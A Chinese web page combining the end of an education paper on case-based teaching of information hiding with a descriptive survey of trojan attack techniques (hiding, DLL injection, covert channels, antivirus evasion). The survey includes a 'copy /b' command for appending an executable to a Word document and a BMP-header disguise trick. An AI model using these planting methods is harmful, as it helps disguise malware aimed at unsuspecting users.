案例教学法既能有效提高学生的动手能力,又能加深学生对理论知识的理解,贯穿于信息隐藏技术课程教学的全过程。首先,通过案例来讲解信息隐藏的基本原理,将一个典型的、易于理解的和具有实际应用意义的案例引入教学中,将复杂的概念用形象生动的案例来进行阐述。其次,不同学生的学习能力有所差异,需对不同学生设置相对应要求。通过对案例教学法的初步引入,教师对学生的编程、分析问题能力有了初步了解。通过对不同层次的学生设置不同的教学规程,运用案例教学法才有可能真正提高不同层次学生的综合学习能力。

前期 就信息隐藏技术而言,案例教学法因该课程涉及内容广、深,相应算法复杂,而使教学过程变得烦琐。如果在案例教学法的初始阶段就要求学生完全独立编程,实现某一算法,容易打击学生学习的积极性和降低学习兴趣,产生畏难心理,这将很难取得较好的教学效果。因此,该阶段教师可以多提供易懂代码给学生,让学生在模拟编程中感受课程学习的乐趣。在经过一段练习实践后,学生的编程能力会有所增强,此时可适当减少所供代码比例。

中期 该阶段是培养学生实践编程能力的重要时期,其案例内容的设计与选择需因不同类型学生的差异而有所改变。

1)对于有一定编程能力的学生,教师可以提供一些参考资料,让学生自主编写一些基础程序。

2)具有一定分析能力但编程能力一般的学生,可以通过对算法原理分析来对教师提供的部分代码做适当改进,以验证改进算法的优越性。

3)信息隐藏实验在信息嵌入时,有时为了提高算法性能,需要调整嵌入参数,这时就可以让编程能力相对较弱的学生完成数据验证与分析的任务。

后期 案例教学法的案例内容必须具备完整性、实用性和系统性,这将很好地激发学生学习积极性。案例教学法可以让学生积极参与其中,营造团队合作的良好氛围[5]。随着学生综合能力的提高,可在后期安排课程实习、课程设计等相关任务让学生来完成,如水印嵌入、水印提取等。课后可以通过相关通信媒介来加强学生之间的讨论以及师生间的交流,这样做可以减少课堂讨论时的不可控因素,节约课时,以提高学生动手操作能力。

6 总结

案例教学法可以将理论和实践更好地结合起来,不仅可以很好地调动学生学习的积极性,而且改善了传统课程授课的教学质量,培养学生想学、爱学、学而不厌的态度。学生通过对案例进行分析、设计,可以更好地加深对课程理论知识的理解。案例教学法可以使学生参与实际应用,解决社会现实问题,达到学以致用的目的。案例教学法是对传统教学方法的有益扩充,信息隐藏技术的基本原理必须通过教师课堂讲授,学生才能牢固掌握,才能更好地去指导实践。

淮阴工学院将案例教学法运用到信息隐藏技术课程教学中并已取得显著效果。教学实践表明,案例教学法改变了传统教学中以教师课堂讲授为主的教学方式,以学生为中心,诱导学生主动学习,提高学习兴趣。案例教学法有效地改善了教学体系,提高了教学质量,使学生更全面地掌握信息隐藏算法所涉及的相关认识。传统教学法在理论教学、保持系统完整性方面有着案例教学法无法替代的功效。因此,将两种教学模式有机结合、相辅相成,才能在教学上获得更好的效果。■

参考文献

[1]田保军.软件工程课程案例教学方法的研究[J].内蒙古师范大学学报:教育科学版,2008,21(1):103-105.

[2]王灿辉,张舒,林郎碟.案例教学法在软件工程教学中的应用[J].计算机教育,2012(1):20-23.

[3]张忠林.基于项目驱动模式下的“软件工程”教学改革[J].计算机教育,2009(2):53-55.

隐藏技术论文篇(7)

关键词:木马型;网络攻击;技术分析

网络攻击是指攻击者利用各种控制计算机的攻击手段通过网络技术实现对目标主机系统发动攻击,旨在破坏对方的网络系统或是获取更多有价值的信息。伴随着科技的日益更新和发展,网络攻击技术的发展也呈现出自动化、快速化、动态化的发展趋势。本文将通过两个方面对当前的木马型网络攻击技术进行分析,一方面是对于木马进行简单论述,另一方面是对木马型网络攻击技术的实现的关键技术进行介绍。

一、木马的简要介绍

所谓计算机木马其实是源于古希腊中的特洛伊木马的故事,木马病毒是一种隐藏在计算机网络中的一种可以在毫无察觉的情况下对受害系统进行破坏或窃取的病毒。与一般的病毒一样,木马病毒也是从Unix平台中产生的,直接作用于常见的Windows操作系统中。截至目前为止,木马程序已经更新了好几代,它的危害性和隐藏的密闭性也在不断的提高,目前木马主要包括以下几种类型:远程控制型;密码发送型;键盘记录型;毁坏型;FTP型。它们主要是根据木马对于计算机的具体动作形式来进行划分的。据不完全统计,当前世界上木马已有好几千种,它们虽然都是通过程序实现,但是由于运行的环境的差异性,它们所发生的作用也不尽相同。木马具有隐蔽性、欺骗性、自动恢复性、功能的特殊性。它们都是木马的基本特征。

二、实现木马型网络攻击技术的关键技术

1.木马隐藏技术

木马的隐藏性是木马的最主要特征之一,也是支撑木马在目标主机系统上生存下去的重要特性,因此隐藏技术也是实现木马型网络技术攻击技术的关键性技术。当前木马的隐藏主要分为两种,一种是木马进程的隐藏,另一种是对木马客户端与服务端之间的通信隐藏。木马的伪隐藏是指木马在进程列表中消失,而木马进程仍然进行。而真隐藏是指木马程序将会彻底的不存在或是消失,木马将不再以一个进程或是服务的方式存在。

(1)木马伪隐藏技术。对于木马的伪隐藏的实现相对于真隐藏来说较简单一些。要想实现木马的伪隐藏只需要将木马系统的服务端程序注册为一个服务,那么就可以实现木马进程的隐藏。当一个进程改变了运行的形式而以服务的方式存在的时候,进程将自动实现后台运行,将不会在列表中出现,但这种隐藏技术只能在Windows9X的平台下才能使用。

(2)DLL木马技术。一般情况下,Windows系统的主要的执行文件有Exe和Com文件,这两种文件具有一个共性那就是在文件的运行过程中,都会产生过形成一个独立的进程,因此寻找特定的特殊的进程也是查杀木马的主要方法。而伴随着木马查杀软件的更新和发展,要想实现木马的真正隐藏,要么让木马进程真正的隐藏起来,要么不使用木马进程。而前者的实现可以采用PSAPI,PDH等方法,而实现后者的主要方法就是DLL木马技术。而运行DLL文件的最简单最常用的方法就是Rundll32.exe,Rubdll/Rundll32,它们是系统自带的一种动态链接的工具。针对不同的木马DLL,我们采用不同的加载方法,最常用的加载方法是远程加载法和钩子加载法。

(3)动态代码嵌入技术。所谓动态代码嵌入技术就是将原来的木马进程通过映像的方式拷贝复制到既定的目标进程中,然后紧接着结束当前的木马进程,等到目标进程运行的时候,再通过木马函数对木马进程继续拧重启,这样的话,木马进程将只会仅仅作为一个新的线程而存在,更具有隐蔽性。这种技术既可以适应木马服务器的运行需要,也适应了客户端通信,隐蔽通信的需要。

2.通信安全性技术

木马的客户端和服务器之间的通信安全主要分为两个阶段,一个是隐蔽通信技术,一个是通信的可靠性技术。其实通信的安全性技术也是木马隐藏技术的一个重要组成部分。所谓隐蔽通信技术就是指在用户毫无知情的情况之下仍能实现木马客户端和服务器之间的连接作用,而这种技术实现的关键就是能否顺利的渗透计算机的防火墙,当前渗透防火墙进行隐蔽通信的方法主要有反向连接技术、隐蔽通道技术。而通信可靠性技术就是指通过认证、加密或压缩技术提高木马客户端与服务器端通信的可靠性。

3.植入传播技术

木马的植入方法主要有:

(1)将原来的木马文件转换成为BMP格式。BMP文件通常状况下都具有54个字节,只需要在EXE的文件头加上这54个字节字符,那么原来的文件就会被IE当成是图片文件下载下来,在网页中加上以下的代码可以提高隐蔽性:

(2)利用Internet Explorer Object Data Remote Execution Vulnerabi lity漏洞进行木马植入。

(3)在Word档中加入木马进程 。首先要新建一个doc文件,然后利用VBA编写一个特定的代码,再讲该文档保存为newdoc.doc,再执行以下命令:copy / bxxxx. doc+xxxxx.exe newdoc.doc。通过这个命令可以将两个文件合并成一个文件,这时候可以在文档的末端加入木马程序,只需要点击这个Word文件就是成功植入木马。

4.抗查杀技术

主要的抗查杀技术有关闭病毒防火墙以及其他监控病毒木马的工具进程和线程监控。

三、结语

本文重点介绍了木马型网络攻击技术实现的关键技术,加深了我们对于当前木马攻击技术的了解,但是我们应该客观地对待木马网络攻击技术,自觉承担维护网络安全的义务,不做有损网络安全的事情,自觉地站在反对网络技术攻击的立场之上,为构建和谐安全的网络环境尽上自己的一份力。

参考文献:

[1]廖晓勇,连一峰,戴英侠.网络安全检测的攻击树模型研究[J].计算机工程与应用.2005(34)

[2]邱晓鹏,张玉清,冯登国.缓冲区溢出攻击代码的分析研究[J].计算机工程与应用.2005(18)

友情链接